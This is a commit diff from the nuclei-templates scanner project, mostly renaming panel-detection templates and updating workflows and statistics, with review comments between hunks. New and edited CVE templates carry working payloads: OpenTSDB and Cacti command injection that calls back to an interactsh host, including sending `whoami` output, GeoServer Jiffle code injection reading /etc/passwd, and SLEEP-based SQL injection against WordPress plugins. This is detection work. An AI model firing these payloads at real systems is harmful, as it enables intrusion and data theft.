Merge branch 'main' into master

patch-1
Dhiyaneshwaran 2023-01-09 21:13:29 +05:30 committed by GitHub
commit 5dd40c8bf8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
86 changed files with 3482 additions and 2418 deletions


@ -3,7 +3,7 @@ name: ✍🏻 CVE Annotate
on:
push:
branches:
- master
- main
workflow_dispatch:
jobs:


@ -3,7 +3,7 @@ name: 🥳 New Template List
on:
push:
branches:
- master
- main
workflow_dispatch:
jobs:


@ -1,6 +1,8 @@
name: ❄️ YAML Lint
on: [push, pull_request]
on:
pull_request:
workflow_dispatch:
jobs:
build:


@ -3,7 +3,7 @@ name: 📑 Template-DB Indexer
on:
push:
branches:
- master
- main
workflow_dispatch:
jobs:


@ -1,6 +1,7 @@
name: 🛠 Template Validate
on: [ push, pull_request ]
on:
pull_request:
jobs:
build:
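Review bot: Commits that reach the branch without a pull request are no longer validated, because `on:` is reduced to `pull_request:` alone. Unlike the YAML Lint workflow changed in this same commit, it also gets no `workflow_dispatch:` for a manual run. At least one other workflow on this page pushes commits straight to the branch through `ad-m/github-push-action`, and as far as this section shows those pushes would skip template validation. Consider adding `workflow_dispatch:` here, or keeping a `push:` trigger restricted to the default branch. The job body lies outside the hunk.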


@ -10,7 +10,9 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v3
with:
fetch-depth: 0
- uses: actions/setup-go@v2
with:
go-version: 1.18
@ -51,5 +53,4 @@ jobs:
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master
github_token: ${{ secrets.GITHUB_TOKEN }}
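Review bot: `uses: ad-m/github-push-action@master` in the second hunk still tracks a mutable branch of a third-party action while it is handed `${{ secrets.GITHUB_TOKEN }}` to push, so whatever lands on that upstream branch runs with this repository's token. The commit pins `actions/checkout` to `@v3` in the first hunk but leaves this step untouched. Pin it to a reviewed full commit SHA, e.g. `uses: ad-m/github-push-action@<full-commit-sha> # <release tag>` (placeholder values). With `branch: master` removed the step falls back to the action's default target, so confirm that default is the branch this job checks out.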


@ -1,8 +1,10 @@
name: ✨ WordPress Plugins - Update
on:
schedule:
- cron: "0 4 * * *" # every day at 4am UTC
workflow_dispatch:
jobs:
Update:
runs-on: ubuntu-latest


@ -0,0 +1,6 @@
exposed-panels/episerver-panel.yaml
exposed-panels/freepbx-administration-panel.yaml
exposures/mobiproxy-dashboard.yaml
misconfiguration/installer/impresspages-installer.yaml
misconfiguration/installer/monstra-installer.yaml
misconfiguration/installer/orangehrm-installer.yaml


@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
**335 directories, 5229 files**.
**336 directories, 5244 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff


@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |


@ -21,6 +21,7 @@ info:
shodan-query: title:"Grafana"
tags: cve,cve2020,xss,grafana,hackerone
requests:
- raw:
- |


@ -4,7 +4,8 @@ info:
name: OpenTSDB <= 2.4.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
description: |
OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
reference:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
@ -14,29 +15,32 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35476
cwe-id: CWE-78
metadata:
verified: true
shodan-query: html:"OpenTSDB"
tags: cve,cve2020,opentsdb,rce,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- plotted
- timing
- cachehit
part: body
condition: and
- type: word
part: header
words:
- application/json
part: header
# Enhanced by mp on 2022/04/28
- type: status
status:
- 200
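Review bot: No matcher reads the out-of-band interaction even though the request now embeds `{{interactsh-url}}`. A match is still decided only by status 200, the `application/json` header and the words `plotted`, `timing`, `cachehit` in the body. Those describe a completed graph query rather than command execution, so presumably an instance that renders the graph without executing the `yrange` value would also be reported as critical. Add a callback matcher under the existing `matchers-condition: and`, for example `- type: word` / `part: interactsh_protocol` / `words: ["dns"]`. The page does not show which of the duplicated matcher lines are old and which are new, so check the final matcher list against the file.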


@ -0,0 +1,36 @@
id: CVE-2021-24946
info:
name: Modern Events Calendar < 6.1.5 - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue.
reference:
- https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445
- https://wordpress.org/plugins/modern-events-calendar-lite/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24946
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24946
cwe-id: CWE-89
metadata:
verified: "true"
tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200 || status_code == 500'
- 'contains(content_type, "text/html")'
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
condition: and
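Review bot: Detection rests on a single delayed response (`duration>=6` after `sleep(6)`, under `@timeout: 10s`), so a slow or overloaded host that takes six seconds to return one of the expected bodies is reported as a critical SQL injection. Accepting `status_code == 500` together with "been a critical error" widens this, since a generic WordPress fatal-error page plus latency satisfies every condition. The new CVE-2022-0784 template on this page uses the same single-request timing pattern. Consider a baseline request without the delay to compare against, or at least dropping the 500 branch. The template also lacks a `remediation:` field naming the fixed release (6.1.5 according to the title).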


@ -17,7 +17,7 @@ info:
cwe-id: CWE-79
metadata:
verified: "true"
tags: wp-plugin,wp,unauth,cve,cve2021,wordpress,xss,give,wpscan
tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve
requests:
- raw:


@ -39,21 +39,17 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header
words:
- "text/html"
- "application/x-www-form-urlencoded"
condition: or
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "uid="
- "gid="
- "groups="
part: body
condition: and
# Enhanced by mp on 2022/07/15


@ -0,0 +1,39 @@
id: CVE-2022-0784
info:
name: Title Experiments Free < 9.0.1 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
- https://wordpress.org/plugins/wp-experiments-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0784
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress
requests:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
condition: and


@ -17,7 +17,7 @@ info:
cwe-id: CWE-89
metadata:
verified: "true"
tags: kivicare-clinic-management-system,unauth,wp,sqli,wordpress,wp-plugin,wpscan,cve,cve2022
tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan
requests:
- raw:


@ -17,7 +17,7 @@ info:
cwe-id: CWE-200
metadata:
verified: "true"
tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth
tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url
requests:
- raw:


@ -16,7 +16,7 @@ info:
cve-id: CVE-2022-2314
metadata:
verified: "true"
tags: rce,unauth,wordpress,wp-plugin,wp,vr-calendar-sync,wpscan,cve,cve2022
tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin
requests:
- raw:


@ -0,0 +1,73 @@
id: CVE-2022-24816
info:
name: Geoserver Server - Code Injection
author: mukundbhuva
severity: critical
description: |
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22.
reference:
- https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-24816
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
- https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24816
cwe-id: CWE-94
metadata:
fofa-query: app="GeoServer"
shodan-query: /geoserver/
verified: "true"
tags: cve,cve2022,geoserver,rce
requests:
- raw:
- |
POST /geoserver/wms HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "ExceptionInInitializerError"
condition: and
- type: status
status:
- 200
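Review bot: The check confirms execution by reading `/etc/passwd` and requiring `root:.*:0:0:` in the body, which only works on Unix-like hosts and pulls account data from every matching target into the response the scanner records. A GeoServer running on Windows would be missed, and stored scan results may end up holding that file's contents. Echoing a fixed marker string back, in the style of the `variables:` / `command:` entry in the CVE-2022-33891 template on this page, would establish the same finding without either drawback. Separately, "GeoServer project Version < 1.1.22" in the description may be read as a GeoServer version, while the linked advisory and commit are in the jai-ext repository. Reword it so readers check the right component.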


@ -17,8 +17,9 @@ info:
cwe-id: CWE-77
metadata:
shodan-query: title:"Spark Master at"
cve-id: CVE-2022-33891
verified: "true"
tags: spark,authenticated,packetstorm,cve,cve2022,apache
tags: packetstorm,cve,cve2022,apache,spark,authenticated
variables:
command: "echo CVE-2022-33891 | rev"


@ -19,7 +19,7 @@ info:
cwe-id: CWE-89
metadata:
verified: "true"
tags: wp-plugin,wp,wp-smart-contracts,authenticated,wpscan,cve,cve2022,wordpress,sqli
tags: wp-smart-contracts,authenticated,cve,wordpress,wp,sqli,cve2022,wp-plugin,wpscan
requests:
- raw:


@ -17,7 +17,7 @@ info:
cwe-id: CWE-89
metadata:
verified: "true"
tags: wpscan,cve,cve2022,sqli,joomsport-sports-league-results-management,wordpress,wp-plugin,wp,unauth
tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth
requests:
- raw:


@ -16,7 +16,7 @@ info:
cwe-id: CWE-79
metadata:
verified: "true"
tags: xss,wp-ban,wpscan,cve,cve2022,wordpress,wp-plugin,wp,authenticated
tags: wp-plugin,xss,wp-ban,authenticated,wpscan,cve,cve2022,wordpress,wp
requests:
- raw:


@ -19,7 +19,7 @@ info:
metadata:
shodan-query: http.html:"ILIAS"
verified: "true"
tags: packetstorm,seclists,cve,cve2022,ilias,redirect
tags: redirect,packetstorm,seclists,cve,cve2022,ilias
requests:
- method: GET


@ -0,0 +1,48 @@
id: CVE-2022-46169
info:
name: Cacti <= 1.2.22 Unauthenticated Command Injection
author: Hardik-Solanki
severity: critical
description: |
The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.
reference:
- https://security-tracker.debian.org/tracker/CVE-2022-46169
- https://nvd.nist.gov/vuln/detail/CVE-2022-46169
- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
- https://www.cybersecurity-help.cz/vdb/SB2022121926
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46169
cwe-id: CWE-285
metadata:
shodan-query: title:"Login to Cacti"
verified: "true"
tags: cve2022,cve,auth-bypass,cacti
requests:
- raw:
- |
GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}/`whoami`; HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
unsafe: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"value":'
- '"local_data_id":'
condition: and
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
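Review bot: The request appends a backtick-wrapped `whoami` to the callback URL, yet no matcher or extractor reads the interaction request, so the service account name is sent to the external interaction host without contributing to detection. Dropping that substitution keeps the probe to what the `interactsh_protocol` match needs. The name and description describe command injection while `tags:` carries only `auth-bypass`, so runs filtered on `rce` skip this template; `tags: cve,cve2022,cacti,rce,unauth,auth-bypass` would cover both. The hard-coded `host_id=1` and `local_data_ids[0]=1` mean an affected instance without those ids may not return the expected body, which deserves a comment above the request.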


@ -1,9 +1,14 @@
id: aircube-dashboard-panel
info:
name: AirCube Dashboard Panel
name: airCube Dashboard Login Panel - Detect
author: theamanrawat
severity: info
description: airCube Dashboard login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"AirCube Dashboard"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: content-central-login
info:
name: Content Central Login Panel
name: Content Central Login Panel - Detect
author: theabhinavgaur
severity: info
description: Content Central login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Content Central Login"
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: creatio-login-panel
info:
name: Creatio Login Panel
name: Creatio Login Panel - Detect
author: theamanrawat
severity: info
description: Creatio login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Creatio"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: dqs-superadmin-panel
info:
name: DQS Superadmin Login Panel
name: DQS Superadmin Login Panel - Detect
author: Hardik-Solanki
severity: info
description: DQS Superadmin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"DQS Superadmin"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -0,0 +1,28 @@
id: episerver-panel
info:
name: Episerver Login Panel
author: William Söderberg @ WithSecure
severity: info
description: Optimizely CMS was detected. Optimizely CMS was formerly known as Episerver.
reference:
- https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls
metadata:
verified: true
shodan-query: html:"epihash"
tags: panel,optimizely,episerver
requests:
- method: GET
path:
- "{{BaseURL}}/episerver/cms"
matchers-condition: and
matchers:
- type: regex
regex:
- "Util.*%2fepiserver%2fcms"
- type: status
status:
- 302
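Review bot: The regex matcher `Util.*%2fepiserver%2fcms` has no `part:`, so it is evaluated against the default part (the body, as far as I know) even though on a 302 the login redirect target lives in the `Location` header. It matches only where the server also writes the target into a redirect body; add `part: header` to make the intent explicit and cover responses with an empty body. The name says "Episerver Login Panel" while the description says Optimizely CMS was detected. The other panel templates in this commit use the form "<Product> Login Panel - Detect", and this one should follow it.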


@ -1,9 +1,14 @@
id: flahscookie-superadmin-panel
info:
name: Flahscookie Superadmin Login
name: Flahscookie Superadmin Login Panel - Detect
author: Hardik-Solanki
severity: info
description: Flahscookie Superadmin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Flahscookie Superadmin"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -0,0 +1,34 @@
id: freepbx-administration-panel
info:
name: FreePBX Administration Panel
author: tess
severity: info
metadata:
verified: "true"
shodan-dork: http.title:"FreePBX Administration"
tags: freepbx,panel
requests:
- method: GET
path:
- '{{BaseURL}}/admin/config.php#'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'FreePBX Administration'
- 'Operator Panel'
- 'User Control Panel'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
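Review bot: The metadata key is written `shodan-dork:` while the other templates on this page use `shodan-query:`, so tooling that reads the standard key will not find this query. Change it to `shodan-query: http.title:"FreePBX Administration"`. `verified: "true"` is a quoted string here but a boolean `true` in the other new panel templates; pick one form. The template also has no `description:`, and the trailing `#` in `/admin/config.php#` is a fragment that is normally not sent to the server, so it can be dropped.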


@ -1,9 +1,14 @@
id: gyra-master-admin
info:
name: GYRA Master Admin
name: GYRA Master Admin Login Panel - Detect
author: Hardik-Solanki
severity: info
description: GYRA Master Admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Login | GYRA Master Admin"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: ilias-panel
info:
name: ILIAS Panel
name: ILIAS Login Panel - Detect
author: arafatansari
severity: info
description: ILIAS login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"ILIAS"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,11 +1,16 @@
id: jalios-jcms-panel
info:
name: Jalios JCMS Panel
name: Jalios JCMS Login Panel - Detect
author: righettod
severity: info
description: Jalios JCMS login panel was detected.
reference:
- https://www.jalios.com/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"Jalios JCMS"
@ -30,3 +35,5 @@ requests:
- "JCMS_login"
- "/jcms/"
condition: or
# Enhanced by md on 2023/01/03


@ -0,0 +1,30 @@
id: lenovo-fp-panel
info:
name: Lenovo Fan and Power Controller Panel
author: megamansec
severity: info
metadata:
verified: true
shodan-query: http.html:"Avocent Corporation and its affiliates"
tags: panel,lenovo
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/login.html"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Avocent Corporation and its affiliates"
- type: status
status:
- 200
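Review bot: The only content matcher is the vendor copyright string `Avocent Corporation and its affiliates`, which presumably appears on other Avocent-built management interfaces too, so a hit does not by itself identify a Lenovo Fan and Power Controller. Add a second, product-specific word with `condition: and`, such as a page title or resource name taken from a real response (none is visible on this page). The template also lacks a `description:`, which the other panel templates in this commit carry.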


@ -1,9 +1,14 @@
id: loxone-panel
info:
name: Loxone Intercom Video Login
name: Loxone Intercom Video Panel - Detect
author: theabhinavgaur
severity: info
description: Loxone Intercom Video panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Loxone Intercom Video"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: mag-dashboard-panel
info:
name: MAG Dashboard Panel
name: MAG Dashboard Login Panel - Detect
author: theamanrawat
severity: info
description: MAG Dashboard login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"MAG Dashboard Login"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: microfocus-admin-server
info:
name: Micro Focus Enterprise Server Administration
name: Micro Focus Enterprise Server Admin Panel - Detect
author: theabhinavgaur
severity: medium
description: Micro Focus Enterprise Server Admin panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: "Micro Focus DSD"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03
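Review bot: The added classification gives `cvss-score: 0.0` with a vector ending `C:N/I:N/A:N`, but `severity: medium` is left in place, so the template contradicts itself and still surfaces under medium-severity filters. The other panel-detect templates touched by this commit carry `severity: info`. Either change this one to `severity: info`, or keep medium and supply a vector and score that justify it.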


@ -1,8 +1,7 @@
id: mikrotik-routeros
info:
name: MikroTik Router OS - Login Panel Detect
name: MikroTik Router OS Login Panel - Detect
author: gy741
severity: info
description: MikroTik Router OS login panel was detected.
@ -59,3 +58,5 @@ requests:
- '<div class="top">mikrotik routeros (.[0-9.]+) configuration page</div>'
- 'routeros (.[0-9.]+) '
- '<b>MikroTik RouterOS (.[0-9.]+)</b>'
# Enhanced by md on 2023/01/03


@ -0,0 +1,25 @@
id: mpftvc-admin-panel
info:
name: MPFTVC Admin Login Panel
author: Hardik-Solanki
severity: info
metadata:
verified: true
shodan-query: title:"AdminLogin - MPFTVC"
tags: panel,mpftvc,admin
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "AdminLogin - MPFTVC"
- type: status
status:
- 200


@ -1,9 +1,14 @@
id: ncentral-panel
info:
name: N-central Login Panel
name: N-central Login Panel - Detect
author: theabhinavgaur
severity: info
description: N-central login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"N-central Login"
